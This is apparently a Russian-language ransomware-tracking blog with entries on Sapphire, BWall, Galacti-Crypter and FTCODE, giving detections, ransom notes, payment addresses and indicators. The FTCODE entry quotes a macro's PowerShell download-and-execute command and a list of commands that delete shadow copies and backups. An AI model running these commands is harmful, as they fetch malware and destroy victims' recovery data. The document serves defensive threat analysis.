Sapphire

Sapphire Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES+RSA, а затем требует выкуп в $25 в BTC, чтобы вернуть файлы. Оригинальное название: Sapphire Ransomware. На файле написано: Sapphire Ransomware.exe. 
---
Обнаружения: 
DrWeb -> Trojan.Ransom.671
BitDefender -> Gen:Heur.Ransom.HiddenTears.1
ALYac -> Trojan.Ransom.Stupid
Avira (no cloud) -> TR/Ransom.npwej
ESET-NOD32 -> A Variant Of MSIL/Filecoder.FG

Kaspersky -> HEUR:Trojan.MSIL.Diztakun.gen
Malwarebytes -> Ransom.Sapphire
Rising -> Trojan.Filecoder!8.68 (TFE:C:fiL***
Symantec -> ML.Attribute.HighConfidence
TrendMicro -> TROJ_GEN.R002C0RIT20
---

© Генеалогия: Stupid >> Sapphire

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .sapphire


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Образец этого крипто-вымогателя был найден в конце августа 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Запиской с требованием выкупа выступает экран блокировки: 

 

Содержание записки о выкупе: 

YOUR FILES HAVE BEEN ENCRYPTED!!

Your personal photos, documents, music and videos have been encrypted by Sapphire! I'm in a good mood today and decided that I will not delete your files. But rather hold on to them.

To decrypt them You need to pay me $25 in Bitcoins to get the key.

Your files will remain what they are right now. and they will stay that way until you decrypt your files.

Thank you

Bitcoin Address: 1399Zu6zdH3jUG9XakPKXmi2AWNwvhGAyh

Decrypt: [    ]  [DECRYPT]  

Перевод записки на русский язык: 

ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ !!

Ваши личные фото, документы, музыка и видео зашифрованы Sapphire! Я сегодня в хорошем настроении и решил, что не буду удалять ваши файлы. Но лучше держись за них.

Для их расшифровки вам надо заплатить мне $25 в биткойнах за ключ.

Ваши файлы останутся такими, как сейчас. и они останутся такими, пока вы не расшифруете свои файлы.

Спасибо

Биткойн-адрес: 1399Zu6zdH3jUG9XakPKXmi2AWNwvhGAyh

Расшифровать:  [    ] [РАСШИФРОВАТЬ]

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ Код дешифрования: sapphire_is_a_good_color

➤ Отключает через реестр Windows Диспетчер задач (Task Manager). 

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр. 

Файлы, связанные с этим Ransomware: 
Sapphire Ransomware.exe - название вредоносного файла

Sapphire Ransomware.pdb - название файла проекта

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

C:\Users\Admin\AppData\Local\Temp\Sapphire Ransomware.exe
C:\Users\Brayden D\source\repos\Sapphire Ransomware\Sapphire Ransomware\obj\Debug\Sapphire Ransomware.pdb

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Мьютексы:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email:
BTC: 1399Zu6zdH3jUG9XakPKXmi2AWNwvhGAyh
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ ANY.RUN analysis >>
ⴵ VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>

Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Вариант от 12 февраля 2021:

Сообщение >>

Расширение: .sapphire

➤ Код дешифрования: Dr WeSt

Файл: Sapphire Ransomware.exe

Результаты анализов: VT + TG

*

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as Stupid)
Write-up, Topic of Support

 Thanks: 
 Michael Gillespie, MalwareHunterTeam
 Andrew Ivanov (author)
 dnwls0719

© Amigo-A (Andrew Ivanov): All blog articles. Contact.

BWall

BWall Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 + RSA-4096, а затем требует выкуп в 0,018 BTC, чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: нет данных.

Обнаружения:
DrWeb ->
BitDefender -> Gen:Heur.Ransom.Imps.3
Avira (no cloud) -> TR/Ransom.fsmez
Symantec -> ML.Attribute.HighConfidence
TrendMicro -> Ransom.Win32.BWALL.THICOAIA

© Генеалогия: выясняется, явное родство с кем-то не доказано.

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .bwall или .bw

Фактически используется составное расширение, включающее набор символов. 
Пример зашифрованных файлов:
config.xml.kl3sfeyr4zr2hytlakd56g==.bwall
config2.xml.axvyvu1kxlk9hzb1jjfrlw==.bwall

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Образец этого крипто-вымогателя был обнаружен в конце сентября 2019 г. Вероятно, был создан еще в июле 2019. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: README-BW-[4 HEX CHARACTERS].TXT

Пример: README-BW-gffL.txt

Содержание записки о выкупе:
Your files are encrypted!
Your files (documents, pictures, audio files, source codes) were encrypted with combination of AES-256 and RSA-4096 cryptographic algorithms. Your files will not be deccryptable, without our special decryption service; futhermore, there is an condition that will leave your files encrypted forever if it's not met:
there is a deadline to pay for your data! If that is exceeded, we will not let you decrypt your data (we will not offer any kind of service), you have exactly two weeks to decrypt your data! no recovery tool will help you, such as Recuva, and no Microsoft
feature will help (Shadow Copies). Files with ".bw" extension are encrypted, verify.
The current date time was inserted into the ID, and we can guess every patching attempt.
End of the deadline: HU-HU-HAI
To pay for your files, follow these steps:
1) Set-up a Bitcoin account, we cannot help you in that, but you can search on Google or similar for "bitcoin get started' or "bitcoin help", you can skip this step, if you have already one; we also accept Monero as currency, and we'll give a discount if an anonymous currency like that is used (20%). Do the same research to set-up a Monero account if you don't have one, as well.
2) Send the following amount of money (0,018 BTC) to the following Bitcoin address, and keep the TXID (payment \ transaction id) for later:
1P7VBy5YLBRxNiTjBCgUEzyryzEcfdQWGD
Monero address, for "getting a discount":
44NMuci8TSUJ4TBafyJpQDAHjTBStC0bXWAVmB3im:iaCZfGX0tyfZ5LW83vqYdHKM5DG3i3aFsw7fjnc8ga93Bk6bWAuHa
3) After, send this file and the TXID of before to the following e-mail address, with the subject "Decryption" and with a e-mail address that can receive e-mails at every moment; don't use temporary services, we will reply after six hours at least:
dawndec001@protonmail.com
4) Wait, you will get an e-mail with even more istructions, and, the decryptor.
Don't rename, modify, or try to decrypt your files without our special service.
Don't modify this text file! Don't make decryption impossible even for us.
ID: KILL-ID
Don't modify the ID! Remember, any bad words to our side will make your address banned!
Also, please, don't try to patch or decompile the decryptor once you get it, it doesn't contain the private key of the encryption algorithm.

Перевод записки на русский язык:
Ваши файлы зашифрованы!
Ваши файлы (документы, изображения, аудиофайлы, исходные коды) были зашифрованы с криптографическими алгоритмами AES-256 и RSA-4096. Ваши файлы не будут расшифрованы без нашего специального сервиса дешифрования; более того, есть условие, что ваши файлы останутся навсегда зашифрованными, если оно не будет выполнено:
Установлено время для оплаты ваших данных! Если время истечет, мы не позволим вам расшифровать ваши данные (мы не будем предлагать какие-либо услуги), у вас есть ровно две недели для расшифровки ваших данных! Вам не помогут никакие инструменты восстановления, такие как Recuva, и не Microsoft
Функция может помочь (теневые копии). Файлы с расширением .bw зашифрованы, проверьте.
Текущее время даты было вставлено в ID, и мы можем угадать каждую попытку исправления.
Конец крайнего срока: HU-HU-HAI
Чтобы оплатить ваши файлы, выполните следующие действия:
1) Создайте учетную запись Bitcoin, мы не можем вам в этом помочь, но вы можете выполнить поиск в Google или аналогичном слова "bitcoin get started" или bitcoin get started, вы можете пропустить этот шаг, если он у вас уже есть, мы также Примите Monero в качестве валюты, и мы дадим скидку, если используется анонимная валюта (20%). Сделайте то же самое исследование, чтобы настроить учетную запись Monero, если у вас ее еще нет.
2) Отправьте следующую сумму денег (0,018 BTC) на следующий биткойн-адрес и оставьте TXID (идентификатор платежа / транзакции) для дальнейшего использования:
1P7VBy5YLBRxNiTjBCgUEzyryzEcfdQWGD
Адрес Monero, для "получения скидки":
44NMuci8TSUJ4TBafyJpQDAHjTBStC0bXWAVmB3im: iaCZfGX0tyfZ5LW83vqYdHKM5DG3i3aFsw7fjnc8ga93Bk6bWAuHa
3) После этого отправьте этот файл и TXID перед на следующий адрес электронной почты, с темой «Расшифровка» и с адресом электронной почты, который может получать сообщения электронной почты в любой момент; не пользуйтесь временными услугами, мы ответим как минимум через шесть часов:
dawndec001@protonmail.com
4) Подождите, вы получите email с еще большим количеством инструкций и расшифровщика.
Не переименовывайте, не изменяйте и не пытайтесь расшифровать ваши файлы без нашего специального сервиса.
Не изменяйте этот текстовый файл! Не делайте расшифровку невозможной даже для нас.
ID: KILL-ID
Не изменяйте идентификатор! Помните, что любые плохие слова в нашу сторону сделают ваш адрес забаненным!
Также, пожалуйста, не пытайтесь исправлять или декомпилировать дешифратор, как только вы его получите, он не содержит закрытого ключа алгоритма шифрования.

Запиской с требованием выкупа также выступает изображение, заменяющее обои Рабочего стола.

Содержание текста на экране:
Your files are encrypted.
There is no way to recover them. To get details about what happened and to get details about how to pay, please, search for the following file:
"README-BW-[4 HEX CHARACTERS].TXT", present in every folder. Do it as faster as possible; a timeout was set.
Don't rename, modify \ try to decrypt your files; without our decryption service, every attempt will fail.

Перевод текста на русский язык:
Ваши файлы зашифрованы.
Нет способа их восстановить. Чтобы получить подробную информацию о том, что произошло, и узнать, как оплатить, пожалуйста, найдите следующий файл:
"README-BW-[4 HEX CHARACTERS].TXT", присутствует в каждой папке. Сделайте это как можно быстрее; тайм-аут настроен.
Не переименовывайте, не изменяйте \ не пытайтесь расшифровать ваши файлы; без нашей службы дешифрования каждая попытка потерпит неудачу.

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
README-BW-[4 HEX CHARACTERS].TXT
<random>.exe - случайное название вредоносного файла

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: dawndec001@protonmail.com
BTC: 1P7VBy5YLBRxNiTjBCgUEzyryzEcfdQWGD
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

Список шифровальщиков от одного разработчика: 
Viagra Ransomware
BWall Ransomware
HildaCrypt (v.1, 1.1, 1.2) Ransomware
HildaCrypt-Stahp Ransomware

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as ***)
 Write-up, Topic of Support
 * 

 Thanks: 
 MalwareHunterTeam
 Andrew Ivanov (author)
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

Galacti-Crypter

Galacti-Crypter Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью RSA-2048, а затем требует выкуп в 0.2 BTC (~$150), чтобы вернуть файлы. Оригинальное название: Galacti-Crypter 1.7 и 1.8, RANWareV2. На файле написано: RANWareV2 и GL.exe

Обнаружения:
DrWeb -> нет данных
BitDefender -> Trojan.GenericKD.32300856
Malwarebytes -> Ransom.Galacti


© Генеалогия: выясняется, явное родство с кем-то не доказано.

К зашифрованным файлам вместо расширения добавляется ENCx45cR.
Пример зашифрованного файла: ENCx45cRPhoto001.jpg

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Возможно, что он уже был в августе. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Текстовая записка с требованием выкупа отсутствует. Текст содержится внутри экрана блокировки. 

Содержание записки о выкупе в экране блокировки:
READ:
IT IS VERY IMPORTANT THAT YOU DO NOT RENAME ANY FILES THAT WERE ENCRYPTED! THIS WILL LEAD TO THAT FILE BEING RE-ENCRYPTED AND THEN WILL BE LOST FOREVER!
Your important files on this computer were encrypted using a public RSA-2048 key, generated for this computer (photos, videos, documents, ect... Click the View Secured Files button to view all of your encrypted files). 
Getting rid of this tool will NOT help. You will need this tool to DECRYPT and get access to your files again.
Your private decryption key has been created and stored on a secure and anonymous server. This key will allow you to decrypt all your files. This key is somewhere in the internet, and if payment is not made in the required time, it will be erased off the server permanently, and ALL your files will be permanently lost.
To obtain your private key for this computer, you will need to pay 150.00 USD / 150.00 EUR BitCoin. This is equal to 0.2 Bitcoin that must be paid to decrypt and regain access to all your files.
ANY attempts to remove, tamper or damage this software WILL lead to immediate termination of the private key and ALL your files will be permanently LOST.
Your time remaining is indicated on the left.
If you are ready to make the payment, please click the button below.

Перевод записки на русский язык:
ПРОЧТИТЕ:
ОЧЕНЬ ВАЖНО, ЧТОБЫ ВЫ НЕ ПЕРЕИМЕНОВЫВАЛИ ФАЙЛЫ, КОТОРЫЕ БЫЛИ ЗАШИФРОВАНЫ! ЭТО ПРИВЕДЕТ К ТОМУ, ЧТО ЭТОТ ФАЙЛ БУДЕТ ПОВТОРНО ЗАШИФРОВАН, А ЗАТЕМ БУДЕТ ПОТЕРЯН НАВСЕГДА!
Ваши важные файлы на этом компьютере были зашифрованы с использованием открытого ключа RSA-2048, созданного для этого компьютера (фото, видео, документы и т.д. Нажмите кнопку View Secured Files, чтобы просмотреть все зашифрованные файлы).
Избавление от этого инструмента НЕ поможет. Вам понадобится этот инструмент, чтобы РАСШИФРОВАТЬ и снова получить доступ к вашим файлам.
Ваш личный ключ расшифровки был создан и хранится на безопасном и анонимном сервере. Этот ключ позволит вам расшифровать все ваши файлы. Этот ключ находится где-то в Интернете, и если оплата не будет произведена в течение требуемого времени, он будет удален с сервера навсегда, и ВСЕ ваши файлы будут навсегда потеряны.
Чтобы получить свой закрытый ключ для этого компьютера, вам нужно будет заплатить 150,00 долларов США / 150,00 евро в биткойнах. Это равно 0,2 биткойнам, которые необходимо заплатить, чтобы расшифровать и восстановить доступ ко всем вашим файлам.
ЛЮБЫЕ попытки удалить, подделать или повредить эту программу приведут к немедленному прекращению действия закрытого ключа, и ВСЕ ваши файлы будут утеряны навсегда.
Ваше оставшееся время указано слева.
Если вы готовы сделать оплату, нажмите кнопку ниже.

Скриншоты других окон экрана блокировки.

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
GL.exe
<random>.exe - случайное название вредоносного файла

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email:
BTC:
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание! 
Файлы можно расшифровать.
Загрузите Emsisoft Decryptor для Galacti-Crypter Ransomware >>

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as Galacti-Crypter)
 Write-up, Topic of Support
 * 

 Thanks: 
 Michael Gillespie, MalwareHunterTeam
 Andrew Ivanov (author)
 Emsisoft
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

FTCODE

FTCODE Ransomware

FTCode Ransomware

PowerShell Locker 2019 Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 (в режиме CBC) + RSA-1024, а затем требует выкуп в $500 (0.06 BTC), чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: нет данных.

Обнаружения:
DrWeb -> W97M.Siggen.1152, Trojan.Siggen8.50878
BitDefender -> Undetected, W97M.Downloader.INK, VB:Trojan.VBS.Downloader.AIR
ALYac -> Trojan.Ransom.Powershell
Avira (no cloud) -> TR/Agent.gillq, TR/Dldr.Script.pskrh
Symantec -> W97M.Downloader, Downloader, JS.Downloader
Microsoft -> Trojan:Win32/Vigorf.A, TrojanDownloader:O97M/FTCdedoc.A!M

ESET-NOD32 -> PowerShell/Filecoder.V, GenScript.GKP
Kaspersky -> HEUR:Trojan.Script.Generic, Trojan.Gen.MBT, Trojan-Downloader.VBS.Agent.cxu
TrendMicro -> Trojan.W97M.POWLOAD.THJAEAI, Ransom.VBS.BXCODE.A

© Генеалогия: PowerShell Locker 2013 > PowerShell Locker 2015 > PowerWare > FTCODE

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .FTCODE


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: READ_ME_NOW.htm

Содержание записки о выкупе:
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!! our price 500 USD
Your personal ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.

Перевод записки на русский язык:
Все ваши файлы были зашифрованы!
Да, вы можете расшифровать файлы в зашифрованном виде !!! наша цена 500 долларов
Ваш персональный ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Скачайте Tor браузер - https://www.torproject.org/download/
2. Установите Tor браузер 
3. Откройте Tor браузер 
4. Откройте ссылку в Tor браузере: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Следуйте инструкциям на этой странице
***** Предупреждение *****
Не переименовывать файлы
Не пытаться создавать резервные копии своих данных с помощью сторонних программ, это может привести к необратимой потере данных (если вы нам не верите и все еще пытаетесь сделать копии всех файлов, чтобы мы могли помочь вам, сторонние программы навредят им)
В качестве доказательства мы можем бесплатно вернуть один файл
Декодеры других пользователей не подходят для резервного копирования ваших файлов - ключ шифрования создается на вашем компьютере при запуске программы - он уникален.

Скриншоты Tor-сайта вымогателей:

По истечении заданного количества дней, если выкуп не выплачивается, то сумма выкупа увеличивается:
первые 3 дня - $500
3-5 дней - $2500
5-10 дней - $5000
10-30 дней - $25000

Есть кнопка для удаления приватного ключа. 

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Метод распространения с помощью email-спама и вредоносного email-вложения и запуска описан в статье Certego. Вот краткая часть в переводе на русский язык: 

Адресат получает email со ссылкой на поддельный счет с вложенным документом под названием "Fattura-2019-951692.doc". Для просмотра "защищенного" содержимого требуется включить макросы. После включения макросов запускается следующий процесс Powershell:
powershell iex ((New-Object Net.WebClient).DownloadString('xxxp://home.southerntransitions.net/?need=9f5b9ee&vid=dpec2&81038'));
В результате чего загружается фрагмент Powershell-кода, который запускается с помощью команды "Invoke-Expression" ("iex"). Обратите внимание, функция "DownloadString" сохраняет результат запроса только в памяти, чтобы избежать обнаружения антивирусами.
Новый код Powershell - это FTCODE . При выполнении он выполняет следующий запрос GET: 
xxxp://home.southerntransitions[.]net/?need=6ff4040&vid=dpec2&
Он нужен, что загрузить файл сценария Visual Basic и сохранить его в C:\Users\Public\Libraries\WindowsIndexingService.vbs
Этот вариант JasperLoader, простой бэкдор, который может загружать дополнительные необходимые данные.
Затем он пытается создать ярлык "WindowsIndexingService.lnk" в папке автозапуска пользователя, который запускает JasperLoader. Для закрепления в системе и запуска после перезагрузки создается запланированная задача "WindowsApplicationService", ссылающаяся на этот ярлык. 


Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ Использует WindowsPowerShell и WindowsIndexingService.vbs, в очередной раз подтверждая их вредоносность для ОС Windows.

➤ Используется Gootkit, который способен похищать из браузеров историю посещений, пароли и файлы cookie, может делать снимки экрана и записывать все, что пользователи вводят внутри веб-форм (пароли, данные банковских карт). Кроме этого Gootkit собирает всю возможную информацию о зараженном хосте и подключенном нему оборудовании.

➤ Завершает работу, если присутствует файл %PUBLIC%\OracleKit\w00log03.tmp

Удаляет теневые копии файлов, отключает функции восстановления и исправления Windows на этапе загрузки командами:
 schtasks.exe /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 14 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs
 cmd.exe /c bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
 bcdedit.exe bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
 cmd.exe /c bcdedit /set hacebzb recoveryenabled no
 bcdedit.exe bcdedit /set hacebzb recoveryenabled no
 cmd.exe /c wbadmin delete catalog -quiet
 wbadmin.exe wbadmin delete catalog -quiet
 cmd.exe /c wbadmin delete systemstatebackup
 wbadmin.exe wbadmin delete systemstatebackup
 cmd.exe /c wbadmin delete backup
 wbadmin.exe wbadmin delete backup
 cmd.exe /c vssadmin delete shadows /all /quiet
 vssadmin.exe vssadmin delete shadows /all /quiet

Список файловых расширений, подвергающихся шифрованию:
.3fr, .7z, .accdb, .ai, .apk, .arch00, .arw, .asset, .avi, .bar, .bay, .bc6, .bc7, .big, .bik, .bkf, .bkp, .blob, .bsa, .cas, .cdr, .cer, .cfr, .cr2, .crt, .crw, .css, .csv, .d3dbsp, .das, .dazip, .db0, .dba, .dbf, .dcr, .der, .desc, .dmp, .dng, .doc, .docm, .docx, .dwg, .dxg, .epk, .eps, .erf, .esm, .ff, .flv, .forge, .fos, .fpk, .fsh, .gdb, .gho, .hkdb, .hkx, .hplg, .hvpl, .ibank, .icxs, .indd, .itdb, .itl, .itm, .iwd, .iwi, .jpe, .jpeg, .jpg, .js, .kdb, .kdc, .kf, .layout, .lbf, .litemod, .lrf, .ltx, .lvl, .m2, .m3u, .m4a, .map, .mcmeta, .mdb, .mdbackup, .mddata, .mdf, .mef, .menu, .mlx, .mov, .mp4, .mpqge, .mrwref, .ncf, .nrw, .ntl, .odb, .odc, .odm, .odp, .ods, .odt, .orf, .p12, .p7b, .p7c, .pak, .pdd, .pdf, .pef, .pem, .pfx, .pkpass, .png, .ppt, .pptm, .pptx, .psd, .psk, .pst, .ptx, .py, .qdf, .qic, .r3d, .raf, .rar, .raw, .rb, .re4, .rgss3a, .rim, .rofl, .rtf, .rw2, .rwl, .sav, .sb, .sid, .sidd, .sidn, .sie, .sis, .slm, .snx, .sql, .sr2, .srf, .srw, .sum, .svg, .syncdb, .t12, .t13, .tax, .tor, .txt, .upk, .vcf, .vdf, .vfs0, .vpk, .vpp_pc, .vtf, .w3x, .wb2, .wma, .wmo, .wmv, .wotreplay, .wpd, .wps, .x3f, .xf, .xlk, .xls, .xlsb, .xlsm, .xlsx, .xxx, .zip, .ztmp (186 расширений).

Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, файлы wallet, архивы и пр.

Файлы, связанные с этим Ransomware:
Fattura-2019-951692.doc
READ_ME_NOW.htm
AFX50058.tmp
w00log03.tmp - специальный файл
powershell.exe
<random>.exe - случайное название вредоносного файла
Scan_New_Folder-816663234378244557295027251718767477098569059779.vbs

Файлы проектов: 
wscript.pdb, powershell.pdb

➤ В коде есть фраза "BXCODE hack your system". 

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Tor-URL: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/
URL: home.hopedaybook.com
connect.theshotboard.org
Email: - 
BTC: 1ENTEb7MbYfuvUYeTX8foCUPqUnQUWGZsN 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>  AR>>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: средняя.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 1 октября 2019:
Пост в Твиттере >>
Пост в Твиттере >>
Расширение: .FTCODE 
Записка:  READ_ME_NOW.htm
Tor-URL: xxxx://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18ede
URL: xxxx://home.southerntransitions.net/
xxxx://connect.southerntransitions.com/
Файлы: powershell.exe, Fattura-2019-951692.doc
Мьютексы: CLR_PerfMon_WrapMutex, CLR_CASOFF_MUTEX и другие, см. результаты VT.
Результаты анализов: VT + HA + AR

Обновление от 9-11 октября 2019:
Пост в Твиттере >>
Расширение: .<random> 
Записка:  READ_ME_NOW.htm
URL: xxxx://archive.org
xxxx://agency.heritage-insuranceagency.com
Файлы: powershell.exe, WindowsIndexingService.vbs, myvtfile.exe
Результаты анализов: VT + AR

Обновление от 15 октября 2019:
Пост в Твиттере >>
Расширение: .<random> или .<random{6}>
Примеры: .509a49, .21f219, 13d419
Записка: READ_ME_NOW.htm
URL: xxxx://jes.dhinsuranceservices.com/
URL: xxxx://jes.whisperinghillequestriancenter.com
Файл MS Word: Nuovo_documento_52.doc  и с другими номерами
Результаты анализов: VT + HA + AR / VT / VT + HA + VMR

➤ Содержание записки: 
All your files was encrypted!
